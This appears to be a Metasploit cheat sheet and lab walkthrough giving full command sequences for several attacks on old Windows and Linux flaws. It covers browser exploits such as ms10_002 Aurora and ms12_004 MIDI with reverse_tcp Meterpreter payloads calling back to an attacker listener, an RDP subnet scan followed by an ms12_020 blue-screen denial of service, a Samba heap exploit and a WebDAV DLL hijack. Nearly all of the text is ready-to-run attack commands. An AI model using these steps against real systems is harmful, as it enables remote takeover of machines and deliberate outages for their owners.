search name: search for usable exploit modules by keyword
use exploit name: select an exploit module
show options: display the module's configuration options
set option name option: set an option
show payloads: list the compatible (callback) attack payloads
show targets (display the targets, i.e. OS versions)
set TARGET target number (select the target version)
exploit (launch the exploit)
sessions -l (list sessions)
sessions -i id (select a session)
sessions -k id (kill a session)
Ctrl+Z (send the session to the background)
Ctrl+C (terminate the session)
show auxiliary (list auxiliary modules)
use auxiliary name (select an auxiliary module)
set option name option (set an option)
exploit (run the module)
search scanner lists the large number of scanner modules available
Vulnerability test: ms10_002 IE browser vulnerability example (browser)
msf > use exploit/windows/browser/ms10_002_aurora (select the ms10_002_aurora module)
msf exploit(ms10_002_aurora) > show options (view options)
msf exploit(ms10_002_aurora) > set SRVHOST 192.168.230.1 (URL address)
msf exploit(ms10_002_aurora) > set SRVPORT 80 (URL port)
msf exploit(ms10_002_aurora) > set URIPATH / (site root; the default is /)
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp (reverse payload)
msf exploit(ms10_002_aurora) > set LHOST 192.168.230.185 (address the payload calls back to, i.e. this machine)
msf exploit(ms10_002_aurora) > set LPORT 1211 (listening port)
msf exploit(ms10_002_aurora) > exploit (launch the attack)
msf exploit(ms10_002_aurora) > [*] Using URL: http://192.168.230.185:80/ (generated URL; this is the Aurora vulnerability: when the target visits the link, a session is called back to this machine)
msf exploit(ms10_002_aurora) > sessions -i (view targets)
sessions -i 1 (select the host with session id 1)
Meterpreter > shell (gives a shell on the host directly, from which system commands can be run)
Vulnerability test: ms10_018 IE browser vulnerability example (browser)
msf > use exploit/windows/browser/ms10_018_ie_behaviors (select the ms10_018_ie_behaviors module)
msf exploit(ms10_018_ie_behaviors) > show options (view options)
msf exploit(ms10_018_ie_behaviors) > set SRVHOST 192.168.230.1 (URL address)
msf exploit(ms10_018_ie_behaviors) > set SRVPORT 80 (URL port)
msf exploit(ms10_018_ie_behaviors) > set URIPATH / (site root)
msf exploit(ms10_018_ie_behaviors) > set payload windows/shell/reverse_tcp (plain reverse shell)
msf exploit(ms10_018_ie_behaviors) > set LHOST 192.168.230.185 (listening address, this machine)
msf exploit(ms10_018_ie_behaviors) > set LPORT 5555 (listening port, this machine)
msf exploit(ms10_018_ie_behaviors) > exploit (launch the attack; when the target visits the link, a session is called back to this machine)
Vulnerability test: ms10_046 IE browser vulnerability example (browser)
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader (select the ms10_046 module)
msf exploit(ms10_046_shortcut_icon_dllloader) > show options (view options)
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.230.1 (URL address)
msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVPORT 80 (URL port)
msf exploit(ms10_046_shortcut_icon_dllloader) > set URIPATH / (site root directory)
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp (reverse payload)
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.230.186 (callback listening address)
msf exploit(ms10_046_shortcut_icon_dllloader) > set LPORT 4444 (callback listening port)
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit (launch the attack)
Vulnerability test: ms12_004 IE browser vulnerability example (browser)
msf > use exploit/windows/browser/ms12_004_midi (select the ms12_004 module)
msf exploit(ms12_004_midi) > set SRVHOST 192.168.230.176 (URL address)
msf exploit(ms12_004_midi) > set SRVPORT 80 (port)
msf exploit(ms12_004_midi) > set URIPATH / (site root)
msf exploit(ms12_004_midi) > set payload windows/meterpreter/reverse_tcp (reverse payload)
msf exploit(ms12_004_midi) > set LHOST 192.168.230.186 (callback listening address)
msf exploit(ms12_004_midi) > set LPORT 4545 (callback listening port)
msf exploit(ms12_004_midi) > show targets (view the affected versions)
msf exploit(ms12_004_midi) > set target 3 (select the version id)
msf exploit(ms12_004_midi) > exploit (attack)
Vulnerability test: ms12_020 blue-screen (denial of service) attack
msf > use auxiliary/scanner/rdp/ms12_020_check (first use the ms12_020_check module to scan for the vulnerability)
msf auxiliary(ms12_020_check) > show options (view options)
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.230.0/24 (target subnet to scan)
msf auxiliary(ms12_020_check) > set THREADS 50 (threads)
msf auxiliary(ms12_020_check) > exploit (after the scan, any host reported as vulnerable is at risk)
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids (use the ms12_020_maxchannelids module)
msf auxiliary(ms12_020_maxchannelids) > show options (view options)
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.230.129 (the vulnerable host)
msf auxiliary(ms12_020_maxchannelids) > set RPORT 3389 (port; can be omitted, the default is 3389)
msf auxiliary(ms12_020_maxchannelids) > exploit (the target blue-screens after the attack)
Linux Samba vulnerability:
msf > use exploit/linux/samba/lsa_transnames_heap (use the lsa_transnames module)
msf exploit(lsa_transnames_heap) > show options (view options)
msf exploit(lsa_transnames_heap) > set RHOST 192.168.230.157 (target address)
msf exploit(lsa_transnames_heap) > set RPORT 445 (target port)
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell_bind_tcp (payload; note that a bind_tcp payload listens on the target rather than calling back, so LHOST is not used by it)
msf exploit(lsa_transnames_heap) > set LHOST 192.168.230.186 (callback listening address)
msf exploit(lsa_transnames_heap) > set LPORT 3434 (callback listening port)
msf exploit(lsa_transnames_heap) > exploit (attack; since this vulnerability only affects version 3.0.20 and my target VM runs a newer version, the attack failed)
DLL injection attack:
msf > use exploit/windows/browser/webdav_dll_hijacker (use the webdav_dll module)
msf exploit(webdav_dll_hijacker) > show options (view options)
msf exploit(webdav_dll_hijacker) > set SRVHOST 192.168.230.176 (URL address)
msf exploit(webdav_dll_hijacker) > set SRVPORT 80 (URL port)
msf exploit(webdav_dll_hijacker) > set URIPATH / (site root)
msf exploit(webdav_dll_hijacker) > set payload windows/meterpreter/bind_tcp (payload; note that a bind_tcp payload listens on the target rather than calling back, so LHOST is not used by it)
msf exploit(webdav_dll_hijacker) > set LHOST 192.168.230.186 (callback listening address)
msf exploit(webdav_dll_hijacker) > set LPORT 4444 (callback listening port)
msf exploit(webdav_dll_hijacker) > exploit (attack)